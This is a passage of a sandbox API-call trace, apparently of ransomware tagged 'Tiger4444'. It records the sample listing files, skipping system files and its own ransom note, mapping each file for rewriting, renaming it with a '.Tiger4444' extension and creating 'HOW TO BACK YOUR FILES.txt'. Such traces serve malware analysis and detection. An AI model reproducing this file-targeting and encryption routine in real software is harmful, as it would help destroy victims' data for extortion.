(in: Addend=0xc6f98c, Value=6 | out: Addend=0xc6f98c) returned 4303 [0044.578] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea39c8ec, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea39c8ec, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x11daf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hwcompat.txt", cAlternateFileName="")) returned 1 [0044.578] lstrcmpiW (lpString1="hwcompat.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.578] lstrcmpiW (lpString1="hwcompat.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.578] lstrcmpiW (lpString1="hwcompat.txt", lpString2="Tiger4444.exe") returned -1 [0044.578] lstrcmpiW (lpString1="hwcompat.txt", lpString2=".") returned 1 [0044.578] lstrcmpiW (lpString1="hwcompat.txt", lpString2="..") returned 1 [0044.578] lstrcmpiW (lpString1="hwcompat.txt", lpString2="windows") returned -1 [0044.578] lstrcmpiW (lpString1="hwcompat.txt", lpString2="bootmgr") returned 1 [0044.579] lstrcmpiW (lpString1="hwcompat.txt", lpString2="pagefile.sys") returned -1 [0044.579] lstrcmpiW (lpString1="hwcompat.txt", lpString2="boot") returned 1 [0044.579] lstrcmpiW (lpString1="hwcompat.txt", lpString2="ids.txt") returned -1 [0044.579] lstrcmpiW (lpString1="hwcompat.txt", lpString2="NTUSER.DAT") returned -1 [0044.579] lstrcpyW (in: lpString1=0x30aeaf0, lpString2="hwcompat.txt" | out: lpString1="hwcompat.txt") returned="hwcompat.txt" [0044.579] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\hwcompat.txt", dwFileAttributes=0x0) returned 1 [0044.581] lstrlenW (lpString="hwcompat.txt") returned 12 [0044.581] lstrlenW (lpString="Tiger4444") returned 9 [0044.581] lstrcmpiW (lpString1="ompat.txt", lpString2="Tiger4444") returned -1 [0044.582] lstrlenW (lpString=".dll") returned 4 [0044.582] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0044.582] lstrlenW (lpString=".lnk") returned 4 [0044.582] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0044.582] lstrlenW (lpString=".ini") returned 4 [0044.582] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0044.582] lstrlenW (lpString=".sys") returned 4 [0044.582] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0044.582] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\hwcompat.txt" (normalized: "c:\\windows10upgrade\\resources\\amd64\\hwcompat.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.582] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.582] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13603497962) returned 1 [0044.582] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=73135) returned 1 [0044.582] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0044.582] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0044.582] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x120b0, lpName=0x0) returned 0x2c8 [0044.584] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x120b0) returned 0xbe0000 [0044.598] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.598] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0044.598] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.598] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0044.598] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.598] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0044.598] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.598] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0044.598] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13605139324) returned 1 [0044.598] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0044.598] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0044.598] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.599] CloseHandle (hObject=0x2c8) returned 1 [0044.599] CloseHandle (hObject=0x260) returned 1 [0044.601] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\amd64\\hwcompat.txt.Tiger4444") returned 58 [0044.601] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\amd64\\hwcompat.txt" (normalized: "c:\\windows10upgrade\\resources\\amd64\\hwcompat.txt"), lpNewFileName="C:\\Windows10Upgrade\\resources\\amd64\\hwcompat.txt.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\amd64\\hwcompat.txt.tiger4444"), dwFlags=0x1) returned 1 [0044.602] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=73136 | out: Addend=0xc6f980) returned 15120880 [0044.602] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=16 | out: Addend=0xc6f98c) returned 4309 [0044.602] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea39dcc9, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea39dcc9, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x90d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hwexclude.txt", cAlternateFileName="HWEXCL~1.TXT")) returned 1 [0044.602] lstrcmpiW (lpString1="hwexclude.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.602] lstrcmpiW (lpString1="hwexclude.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.602] lstrcmpiW (lpString1="hwexclude.txt", lpString2="Tiger4444.exe") returned -1 [0044.602] lstrcmpiW (lpString1="hwexclude.txt", lpString2=".") returned 1 [0044.602] lstrcmpiW (lpString1="hwexclude.txt", lpString2="..") returned 1 [0044.602] lstrcmpiW (lpString1="hwexclude.txt", lpString2="windows") returned -1 [0044.602] lstrcmpiW (lpString1="hwexclude.txt", lpString2="bootmgr") returned 1 [0044.602] lstrcmpiW (lpString1="hwexclude.txt", lpString2="pagefile.sys") returned -1 [0044.602] lstrcmpiW (lpString1="hwexclude.txt", lpString2="boot") returned 1 [0044.602] lstrcmpiW (lpString1="hwexclude.txt", lpString2="ids.txt") returned -1 [0044.602] lstrcmpiW (lpString1="hwexclude.txt", lpString2="NTUSER.DAT") returned -1 [0044.602] lstrcpyW (in: lpString1=0x30aeaf0, lpString2="hwexclude.txt" | out: lpString1="hwexclude.txt") returned="hwexclude.txt" [0044.602] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\hwexclude.txt", dwFileAttributes=0x0) returned 1 [0044.603] lstrlenW (lpString="hwexclude.txt") returned 13 [0044.603] lstrlenW (lpString="Tiger4444") returned 9 [0044.603] lstrcmpiW (lpString1="clude.txt", lpString2="Tiger4444") returned -1 [0044.603] lstrlenW (lpString=".dll") returned 4 [0044.603] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0044.603] lstrlenW (lpString=".lnk") returned 4 [0044.603] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0044.603] lstrlenW (lpString=".ini") returned 4 [0044.603] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0044.603] lstrlenW (lpString=".sys") returned 4 [0044.603] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0044.603] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\hwexclude.txt" (normalized: "c:\\windows10upgrade\\resources\\amd64\\hwexclude.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.603] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.603] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13605625427) returned 1 [0044.603] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=2317) returned 1 [0044.603] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0044.603] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0044.603] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc10, lpName=0x0) returned 0x2c8 [0044.604] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc10) returned 0xbe0000 [0044.605] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.605] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0044.605] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.605] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0044.606] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.606] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0044.606] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.606] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0044.606] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13605894030) returned 1 [0044.606] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0044.606] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0044.606] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.606] CloseHandle (hObject=0x2c8) returned 1 [0044.606] CloseHandle (hObject=0x260) returned 1 [0044.608] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\amd64\\hwexclude.txt.Tiger4444") returned 59 [0044.608] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\amd64\\hwexclude.txt" (normalized: "c:\\windows10upgrade\\resources\\amd64\\hwexclude.txt"), lpNewFileName="C:\\Windows10Upgrade\\resources\\amd64\\hwexclude.txt.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\amd64\\hwexclude.txt.tiger4444"), dwFlags=0x1) returned 1 [0044.608] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=2320 | out: Addend=0xc6f980) returned 15194016 [0044.608] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4325 [0044.608] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea39eff9, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea39eff9, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x26b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nxquery.cat", cAlternateFileName="")) returned 1 [0044.608] lstrcmpiW (lpString1="nxquery.cat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.608] lstrcmpiW (lpString1="nxquery.cat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.608] lstrcmpiW (lpString1="nxquery.cat", lpString2="Tiger4444.exe") returned -1 [0044.608] lstrcmpiW (lpString1="nxquery.cat", lpString2=".") returned 1 [0044.608] lstrcmpiW (lpString1="nxquery.cat", lpString2="..") returned 1 [0044.608] lstrcmpiW (lpString1="nxquery.cat", lpString2="windows") returned -1 [0044.608] lstrcmpiW (lpString1="nxquery.cat", lpString2="bootmgr") returned 1 [0044.608] lstrcmpiW (lpString1="nxquery.cat", lpString2="pagefile.sys") returned -1 [0044.608] lstrcmpiW (lpString1="nxquery.cat", lpString2="boot") returned 1 [0044.608] lstrcmpiW (lpString1="nxquery.cat", lpString2="ids.txt") returned 1 [0044.608] lstrcmpiW (lpString1="nxquery.cat", lpString2="NTUSER.DAT") returned 1 [0044.608] lstrcpyW (in: lpString1=0x30aeaf0, lpString2="nxquery.cat" | out: lpString1="nxquery.cat") returned="nxquery.cat" [0044.608] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.cat", dwFileAttributes=0x0) returned 1 [0044.609] lstrlenW (lpString="nxquery.cat") returned 11 [0044.609] lstrlenW (lpString="Tiger4444") returned 9 [0044.609] lstrcmpiW (lpString1="query.cat", lpString2="Tiger4444") returned -1 [0044.609] lstrlenW (lpString=".dll") returned 4 [0044.609] lstrcmpiW (lpString1=".cat", lpString2=".dll") returned -1 [0044.609] lstrlenW (lpString=".lnk") returned 4 [0044.609] lstrcmpiW (lpString1=".cat", lpString2=".lnk") returned -1 [0044.609] lstrlenW (lpString=".ini") returned 4 [0044.609] lstrcmpiW (lpString1=".cat", lpString2=".ini") returned -1 [0044.609] lstrlenW (lpString=".sys") returned 4 [0044.609] lstrcmpiW (lpString1=".cat", lpString2=".sys") returned -1 [0044.609] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.cat" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.cat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.609] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.609] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13606236766) returned 1 [0044.609] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=9910) returned 1 [0044.609] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0044.609] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0044.609] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x29c0, lpName=0x0) returned 0x2c8 [0044.614] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x29c0) returned 0xbe0000 [0044.656] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.656] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0044.657] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.657] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0044.657] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.657] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0044.657] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.657] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0044.657] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13611057782) returned 1 [0044.658] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0044.658] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0044.658] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.658] CloseHandle (hObject=0x2c8) returned 1 [0044.658] CloseHandle (hObject=0x260) returned 1 [0044.659] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.cat.Tiger4444") returned 57 [0044.659] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.cat" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.cat"), lpNewFileName="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.cat.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.cat.tiger4444"), dwFlags=0x1) returned 1 [0044.660] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=9920 | out: Addend=0xc6f980) returned 15196336 [0044.660] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=48 | out: Addend=0xc6f98c) returned 4327 [0044.660] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3a3e27, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3a3e27, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x5d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nxquery.inf", cAlternateFileName="")) returned 1 [0044.660] lstrcmpiW (lpString1="nxquery.inf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.660] lstrcmpiW (lpString1="nxquery.inf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.660] lstrcmpiW (lpString1="nxquery.inf", lpString2="Tiger4444.exe") returned -1 [0044.660] lstrcmpiW (lpString1="nxquery.inf", lpString2=".") returned 1 [0044.660] lstrcmpiW (lpString1="nxquery.inf", lpString2="..") returned 1 [0044.660] lstrcmpiW (lpString1="nxquery.inf", lpString2="windows") returned -1 [0044.660] lstrcmpiW (lpString1="nxquery.inf", lpString2="bootmgr") returned 1 [0044.660] lstrcmpiW (lpString1="nxquery.inf", lpString2="pagefile.sys") returned -1 [0044.660] lstrcmpiW (lpString1="nxquery.inf", lpString2="boot") returned 1 [0044.660] lstrcmpiW (lpString1="nxquery.inf", lpString2="ids.txt") returned 1 [0044.660] lstrcmpiW (lpString1="nxquery.inf", lpString2="NTUSER.DAT") returned 1 [0044.660] lstrcpyW (in: lpString1=0x30aeaf0, lpString2="nxquery.inf" | out: lpString1="nxquery.inf") returned="nxquery.inf" [0044.660] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.inf", dwFileAttributes=0x0) returned 1 [0044.660] lstrlenW (lpString="nxquery.inf") returned 11 [0044.661] lstrlenW (lpString="Tiger4444") returned 9 [0044.661] lstrcmpiW (lpString1="query.inf", lpString2="Tiger4444") returned -1 [0044.661] lstrlenW (lpString=".dll") returned 4 [0044.661] lstrcmpiW (lpString1=".inf", lpString2=".dll") returned 1 [0044.661] lstrlenW (lpString=".lnk") returned 4 [0044.661] lstrcmpiW (lpString1=".inf", lpString2=".lnk") returned -1 [0044.661] lstrlenW (lpString=".ini") returned 4 [0044.661] lstrcmpiW (lpString1=".inf", lpString2=".ini") returned -1 [0044.661] lstrlenW (lpString=".sys") returned 4 [0044.661] lstrcmpiW (lpString1=".inf", lpString2=".sys") returned -1 [0044.661] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.inf" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.inf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.661] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.661] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13611402145) returned 1 [0044.661] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=1495) returned 1 [0044.661] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89b30 [0044.661] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc719d8 [0044.661] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8e0, lpName=0x0) returned 0x2c8 [0044.662] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8e0) returned 0xbe0000 [0044.675] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.675] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0044.675] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.675] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0044.675] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.676] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0044.676] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.676] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0044.676] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13612875286) returned 1 [0044.676] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89b30 | out: hHeap=0xc50000) returned 1 [0044.676] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc719d8 | out: hHeap=0xc50000) returned 1 [0044.676] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.676] CloseHandle (hObject=0x2c8) returned 1 [0044.676] CloseHandle (hObject=0x260) returned 1 [0044.677] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.inf.Tiger4444") returned 57 [0044.677] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.inf" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.inf"), lpNewFileName="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.inf.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.inf.tiger4444"), dwFlags=0x1) returned 1 [0044.678] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=1504 | out: Addend=0xc6f980) returned 15206256 [0044.678] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=14 | out: Addend=0xc6f98c) returned 4375 [0044.678] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3a652e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3a652e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x50b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NXQuery.sys", cAlternateFileName="")) returned 1 [0044.678] lstrcmpiW (lpString1="NXQuery.sys", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.678] lstrcmpiW (lpString1="NXQuery.sys", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.678] lstrcmpiW (lpString1="NXQuery.sys", lpString2="Tiger4444.exe") returned -1 [0044.678] lstrcmpiW (lpString1="NXQuery.sys", lpString2=".") returned 1 [0044.678] lstrcmpiW (lpString1="NXQuery.sys", lpString2="..") returned 1 [0044.678] lstrcmpiW (lpString1="NXQuery.sys", lpString2="windows") returned -1 [0044.678] lstrcmpiW (lpString1="NXQuery.sys", lpString2="bootmgr") returned 1 [0044.678] lstrcmpiW (lpString1="NXQuery.sys", lpString2="pagefile.sys") returned -1 [0044.678] lstrcmpiW (lpString1="NXQuery.sys", lpString2="boot") returned 1 [0044.678] lstrcmpiW (lpString1="NXQuery.sys", lpString2="ids.txt") returned 1 [0044.678] lstrcmpiW (lpString1="NXQuery.sys", lpString2="NTUSER.DAT") returned 1 [0044.678] lstrcpyW (in: lpString1=0x30aeaf0, lpString2="NXQuery.sys" | out: lpString1="NXQuery.sys") returned="NXQuery.sys" [0044.678] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\NXQuery.sys", dwFileAttributes=0x0) returned 1 [0044.678] lstrlenW (lpString="NXQuery.sys") returned 11 [0044.678] lstrlenW (lpString="Tiger4444") returned 9 [0044.679] lstrcmpiW (lpString1="Query.sys", lpString2="Tiger4444") returned -1 [0044.679] lstrlenW (lpString=".dll") returned 4 [0044.679] lstrcmpiW (lpString1=".sys", lpString2=".dll") returned 1 [0044.679] lstrlenW (lpString=".lnk") returned 4 [0044.679] lstrcmpiW (lpString1=".sys", lpString2=".lnk") returned 1 [0044.679] lstrlenW (lpString=".ini") returned 4 [0044.679] lstrcmpiW (lpString1=".sys", lpString2=".ini") returned 1 [0044.679] lstrlenW (lpString=".sys") returned 4 [0044.679] lstrcmpiW (lpString1=".sys", lpString2=".sys") returned 0 [0044.679] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3a652e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3a652e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x50b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NXQuery.sys", cAlternateFileName="")) returned 0 [0044.679] FindClose (in: hFindFile=0xc73108 | out: hFindFile=0xc73108) returned 1 [0044.679] lstrcpyW (in: lpString1=0x30aeaf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0044.679] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\resources\\amd64\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0044.679] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0044.679] MapViewOfFile (hFileMappingObject=0x260, 